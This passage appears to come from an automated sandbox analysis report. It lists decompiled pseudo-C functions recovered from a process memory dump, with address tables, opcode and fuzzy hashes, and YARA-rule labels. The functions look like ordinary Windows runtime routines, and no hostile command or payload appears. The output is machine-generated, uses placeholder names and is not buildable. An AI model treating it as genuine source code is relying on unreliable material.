									_push(5);
									_push(0xfffffffe);
									E054095B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E054095D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L053E77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E05409910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E054095D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x54b7b9c; // 0x0
									_t92 = L053E4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E05409910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E053CA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0545E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0545E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E054095B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}

0x0545b8d9
0x0545b8e4
0x00000000
0x0545b8e6
0x0545b8f3
0x0545b8f5
0x0545b8f5
0x0545b8f8
0x0545b920
0x0545b924
0x0545b936
0x0545b939
0x0545b93d
0x0545b948
0x0545b9a0
0x0545b9a0
0x0545b9a4
0x0545b9bf
0x0545b9c4
0x0545b9c6
0x0545b9cd
0x0545b9d1
0x0545bad4
0x0545bad8
0x0545bada
0x0545badc
0x0545badc
0x0545badf
0x0545bae0
0x0545bae2
0x0545bae4
0x0545baec
0x0545baee
0x0545baf0
0x0545baf0
0x0545baec
0x0545bafb
0x0545bafc
0x0545bafe
0x0545bb01
0x0545bb01
0x00000000
0x0545bb06
0x0545b9d7
0x0545b9db
0x0545b9db
0x0545b9de
0x0545b9de
0x0545b9e4
0x0545b9e7
0x0545b9ea
0x0545b9ec
0x0545b9ef
0x0545b9f3
0x0545ba1b
0x0545ba1b
0x0545ba23
0x0545ba24
0x0545ba27
0x0545ba2a
0x0545ba2b
0x0545ba2e
0x0545ba30
0x0545ba37
0x0545ba3f
0x0545ba9c
0x0545baa2
0x0545bb13
0x0545bb15
0x0545baae
0x0545baae
0x0545bab3
0x0545bab5
0x0545baba
0x0545bac8
0x0545bac8
0x0545baba
0x0545bacd
0x0545bacf
0x00000000
0x0545bacf
0x0545bb1a
0x00000000
0x0545bb1c
0x0545baa7
0x0545bb11
0x00000000
0x0545bb11
0x0545baa9
0x00000000
0x00000000
0x00000000
0x00000000
0x0545ba41
0x0545ba41
0x0545ba41
0x0545ba58
0x0545ba5d
0x0545ba62
0x00000000
0x00000000
0x0545ba64
0x0545ba67
0x0545ba68
0x0545ba69
0x0545ba6c
0x0545ba6f
0x0545ba71
0x0545ba78
0x0545ba80
0x00000000
0x00000000
0x0545ba90
0x0545ba90
0x0545ba97
0x00000000
0x0545ba97
0x0545b9f5
0x0545b9f7
0x0545b9f7
0x0545b9fa
0x0545ba03
0x0545ba07
0x0545ba0c
0x0545ba10
0x0545ba17
0x00000000
0x0545b9f7
0x0545b9a6
0x0545b9a8
0x0545b9af
0x0545b9b3
0x00000000
0x00000000
0x0545b9b9
0x00000000
0x0545b9b9
0x0545b94d
0x0545b98f
0x0545b995
0x0545b999
0x0545b960
0x0545b967
0x0545b968
0x0545b96a
0x00000000
0x0545b96a
0x0545b99b
0x0545b99e
0x00000000
0x00000000
0x00000000
0x0545b99e
0x0545b951
0x0545b954
0x0545b95a
0x0545b95e
0x0545b972
0x0545b979
0x0545b97d
0x0545b97f
0x0545b980
0x0545b982
0x0545b984
0x00000000
0x0545b984
0x00000000
0x0545b926
0x00000000
0x0545b926

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c870c8ccca8f70a1735e9f7cdd466c443d1a730f21483154be85e72014cb3d8
Instruction ID: acb934acd71e0ade90f883e5b379fc3ccec242112bb20494350ba60730720399
Opcode Fuzzy Hash: 9c870c8ccca8f70a1735e9f7cdd466c443d1a730f21483154be85e72014cb3d8
Instruction Fuzzy Hash: 2F710332200701AFD732CF15C849FA6B7E6FB44730F24456AE956876E2DB74E941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 053C52A5, Relevance: .2, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E053C52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E053DEEF0(0x54b79a0);
					_t104 =  *0x54b8210; // 0x5102c08
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E053DEB70(_t93, 0x54b79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E05409890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E053DEEF0(0x54b79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E053DEB70(0, 0x54b79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x5102c15
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E053FF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E053DEEF0(0x54b79a0);
									__eflags =  *0x54b8210 - _t104; // 0x5102c08
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x54b8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E05444888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E053DEB70(_t95, 0x54b79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E054095D0();
											L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E054095D0();
											L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E053DEB70(_t93, 0x54b79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E054095D0();
										L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E054095D0();
										L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E053FF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x053c52a5
0x053c52ad
0x053c52b0
0x053c52b3
0x053c52b7
0x053c52ba
0x053c52bf
0x053c52c4
0x053c52cc
0x00000000
0x00000000
0x053c52ce
0x053c52d9
0x053c52dd
0x053c52e7
0x053c52f7
0x053c52f9
0x053c52fd
0x05420dcf
0x05420dd5
0x05420dd6
0x05420dd7
0x05420dd8
0x05420dd9
0x05420dde
0x05420ddf
0x05420de0
0x05420de1
0x05420de2
0x05420de5
0x05420dea
0x05420dec
0x05420f60
0x05420f64
0x05420f70
0x05420f76
0x05420f79
0x05420f79
0x00000000
0x05420f64
0x05420df2
0x05420df7
0x05420e04
0x05420e0d
0x05420e0d
0x05420e10
0x05420e1a
0x05420e1c
0x05420e4c
0x05420e52
0x05420e61
0x05420e67
0x05420e6b
0x05420e70
0x05420e76
0x05420ed7
0x05420edc
0x05420ee0
0x05420ee6
0x05420eea
0x05420eed
0x05420ef0
0x05420ef3
0x05420ef6
0x05420ef9
0x05420efe
0x05420f01
0x05420f01
0x05420f0b
0x05420f12
0x05420f16
0x05420f18
0x05420f1b
0x05420f2c
0x05420f31
0x05420f31
0x05420f35
0x05420f39
0x05420f3a
0x05420f3c
0x05420f3f
0x05420f50
0x05420f55
0x05420f55
0x05420f59
0x053c52eb
0x053c52f1
0x053c52f1
0x05420e7d
0x05420e84
0x05420e88
0x05420e8a
0x05420e8d
0x05420e9e
0x05420ea3
0x05420ea3
0x05420ea7
0x05420eaf
0x05420eb3
0x05420eb9
0x05420eb9
0x05420ebc
0x05420ecd
0x05420ecd
0x00000000
0x05420eb3
0x05420e21
0x05420e2b
0x05420e2f
0x05420e30
0x05420e3a
0x05420e3f
0x05420e41
0x00000000
0x00000000
0x05420e47
0x00000000
0x05420e47
0x05420df9
0x05420dfe
0x00000000
0x00000000
0x00000000
0x05420dfe
0x053c5303
0x053c5307
0x00000000
0x053c5309
0x00000000
0x053c5309
0x053c5307
0x053c52e9
0x053c52e9
0x00000000
0x053c52e9
0x053c530e
0x00000000

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb59b6116376019b41dca0e201b9e39d6e25948680846868a97793c4d0e2341d
Instruction ID: 62f7cffae6e330b1b109e48a33540cc702d3d5284fa72db0b06d7d2845a41c58
Opcode Fuzzy Hash: eb59b6116376019b41dca0e201b9e39d6e25948680846868a97793c4d0e2341d
Instruction Fuzzy Hash: 675111322497519BE321EF64C849BA7BBE9FF84710F14091EE49A87690E7B0F844D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 053F2AE4, Relevance: .2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E053F2AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x54b8204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x54b8208; // 0x54b8207
				_t8 = _t57 + 0x54b8208; // 0x54b8207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x54b8450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x54b821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x54b6d5c; // 0xff690654
							_t72 =  *0x54b6d5c; // 0xff690654
							_t75 =  *0x54b6d5c; // 0xff690654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x54b6d5c; // 0xff690654
							_t84 =  *0x54b6d5c; // 0xff690654
							_t87 =  *0x54b6d5c; // 0xff690654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E0540F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}

0x053f2ae4
0x053f2aec
0x053f2aef
0x053f2af4
0x053f2af7
0x053f2afd
0x053f2b92
0x053f2b92
0x053f2b97
0x053f2b9c
0x053f2b9c
0x053f2b03
0x053f2b06
0x053f2b09
0x053f2b09
0x053f2b0f
0x053f2b15
0x053f2b15
0x053f2b1b
0x053f2b1e
0x053f2b21
0x053f2b26
0x053f2b29
0x053f2b81
0x053f2b84
0x053f2c0e
0x053f2c15
0x053f2c24
0x053f2c24
0x053f2b8a
0x053f2b8a
0x053f2b8a
0x053f2b8a
0x053f2b90
0x00000000
0x00000000
0x00000000
0x00000000
0x053f2b4a
0x053f2b4a
0x053f2b4d
0x053f2b53
0x00000000
0x00000000
0x053f2b55
0x053f2b58
0x053f2bb7
0x05435d1b
0x05435d37
0x05435d47
0x05435d53
0x053f2bbd
0x053f2bbd
0x053f2bbd
0x053f2bb7
0x053f2b5d
0x053f2c2f
0x05435d5b
0x05435d77
0x05435d87
0x05435d93
0x053f2c35
0x053f2c35
0x053f2c35
0x053f2c2f
0x053f2b65
0x053f2b9f
0x053f2ba2
0x053f2b67
0x053f2b67
0x053f2b69
0x053f2b6b
0x053f2b6e
0x053f2bc9
0x053f2bcc
0x053f2bcf
0x053f2bd4
0x053f2bd6
0x053f2bd6
0x053f2bdb
0x053f2c02
0x053f2c05
0x053f2c07
0x00000000
0x053f2c07
0x053f2be0
0x053f2c00
0x053f2c3f
0x053f2c3f
0x00000000
0x053f2c00
0x053f2be5
0x053f2be7
0x053f2bec
0x053f2bf4
0x053f2bf6
0x00000000
0x053f2bf6
0x053f2b70
0x053f2b76
0x053f2b2b
0x053f2b2b
0x053f2b2d
0x053f2b2f
0x053f2b32
0x053f2b35
0x053f2b3a
0x00000000
0x053f2b40
0x053f2b43
0x053f2b45
0x053f2b47
0x053f2b4a
0x053f2b4d
0x053f2b53
0x00000000
0x00000000
0x00000000
0x053f2b53
0x053f2b78
0x053f2b78
0x053f2b7b
0x053f2b7e
0x00000000
0x053f2b7e
0x053f2b76
0x053f2ba5
0x053f2ba5
0x053f2ba8
0x053f2bad
0x00000000
0x00000000
0x053f2baf
0x053f2baf
0x053f2bc2
0x00000000

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed7f750ac8940b69616727985702df314de669059fa695b334b5229366d64635
Instruction ID: 4ecb39294d76b635025b563250880f7b29f0835e83fc74c081b70477288a67ad
Opcode Fuzzy Hash: ed7f750ac8940b69616727985702df314de669059fa695b334b5229366d64635
Instruction Fuzzy Hash: 9351D17AA10125CFCB18CF1DC8809BEB7B6FB88700716845AFD469B364DB30AE51CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0548AE44, Relevance: .2, Instructions: 152
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0548AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E0548C38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E0548ACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E0548FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E0548EA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E053E7D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E05481608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E05491536(0x54b8ae4, (_t74 -  *0x54b8b04 >> 0x14) + (_t74 -  *0x54b8b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L0548C323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E0548A80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E0546CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E0548ACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}

0x0548ae44
0x0548ae4c
0x0548ae53
0x0548ae55
0x0548ae5c
0x0548ae64
0x0548ae68
0x0548ae75
0x0548ae75
0x0548ae78
0x0548ae7a
0x0548ae7c
0x0548ae7f
0x0548aea8
0x0548aeab
0x0548aead
0x00000000
0x00000000
0x0548aeb3
0x0548aeb8
0x0548aebb
0x0548aebd
0x00000000
0x0548ae81
0x0548ae88
0x0548ae8f
0x0548ae9b
0x0548ae96
0x0548ae96
0x0548ae96
0x0548aea0
0x0548aea3
0x0548aebf
0x0548aebf
0x0548aec3
0x0548aec9
0x0548af0d
0x0548af14
0x0548af3d
0x0548af3d
0x0548af41
0x0548af44
0x0548af67
0x0548af67
0x0548af6a
0x0548afca
0x0548afd1
0x00000000
0x0548afd1
0x0548af6c
0x0548af6d
0x0548af75
0x0548af7c
0x0548af7e
0x0548af80
0x0548af85
0x0548af87
0x0548af99
0x0548af89
0x0548af92
0x0548af92
0x0548af9e
0x0548afa1
0x0548afa3
0x0548afa9
0x0548afb0
0x0548afb2
0x0548afb4
0x0548afbc
0x0548afbc
0x0548afb4
0x0548afb0
0x00000000
0x0548afa1
0x0548af4f
0x0548af57
0x0548af5c
0x0548af5e
0x00000000
0x00000000
0x0548af60
0x0548af64
0x0548af64
0x00000000
0x0548af64
0x0548af1a
0x0548af25
0x00000000
0x00000000
0x0548af27
0x0548af28
0x0548af33
0x00000000
0x0548aed0
0x0548aed0
0x0548aed2
0x0548aee1
0x0548aee4
0x00000000
0x00000000
0x0548aee6
0x0548aeec
0x00000000
0x00000000
0x0548aefb
0x0548af07
0x0548afd3
0x0548afdb
0x0548afdb
0x00000000
0x0548af07
0x0548aed6
0x0548aed8
0x0548aedf
0x00000000
0x00000000
0x00000000
0x0548aedf
0x0548aec9

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c052ebed31c4ecb2e500cf5f8e39241a46842fb7f63f41d6c9515cb728e9b65
Instruction ID: 65fdc4fa8924f6f69efc4e738dc51a853459bf0cd45d6e7c2899f7af796f3658
Opcode Fuzzy Hash: 7c052ebed31c4ecb2e500cf5f8e39241a46842fb7f63f41d6c9515cb728e9b65
Instruction Fuzzy Hash: 0441E5B17042119BD726FA27C884BBFB39ABF84630F08465BFA1787394D7B0D802C690

Uniqueness

Uniqueness Score: -1.00%

Function 053EDBE9, Relevance: .1, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E053EDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
